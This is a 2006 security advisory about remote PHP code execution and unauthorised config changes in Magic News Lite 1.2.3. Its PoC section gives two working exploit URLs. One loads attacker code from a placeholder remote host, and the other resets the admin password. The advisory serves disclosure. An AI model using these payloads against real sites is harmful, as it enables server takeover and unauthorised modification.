PHP Exec and Data Modification in Magic News Lite

Summary

Vulnerability
PHP Exec and Data Modification in Magic News Lite
Discovered
2006.02.09
Last Update
2006.02.19 Exploitation code published
ID
EV0072
CVE
CVE-2006-0723 CVE-2006-0724
Risk Level
high
Type
Multiple Vulnerabilities
Status
Unpatched. No reply from developer(s)
Vendor
Reamday Enterprises (http://reamdaysoft.com)
Vulnerable Software
Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html)
Version
1.2.3
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in Magic News Lite (http://reamdaysoft.com/customers/magic-news-lite/download.html) script.

1. PHP Code Execution

Vulnerable script: preview.php

Variable $php_script_path is not initialized before being used in include(). This can be used to execute arbitrary php code.

Condition: register_globals = ON


2. Unauthorized Data Modification

Vulnerable script: profile.php

Variables $action $passwd $admin_password $new_passwd $confirm_passwd are not initialized and their values can be replaced by user-defined data. This can be used to make unauthorized modifications in config.php

Condition: register_globals = ON

PoC/Exploit

1. PHP Code Execution Example

http://host/path/preview.php?php_script_path=http://remotehost/lib.php


2. Unauthorized Data Modification Example

http://host/path/profile.php?action=change&passwd=1&admin_password=1&new_passwd=new&confirm_passwd=new

Solution.

Solution for "PHP Exec and Data Modification in Magic News Lite" is not available. Check Reamday Enterprises website for updates.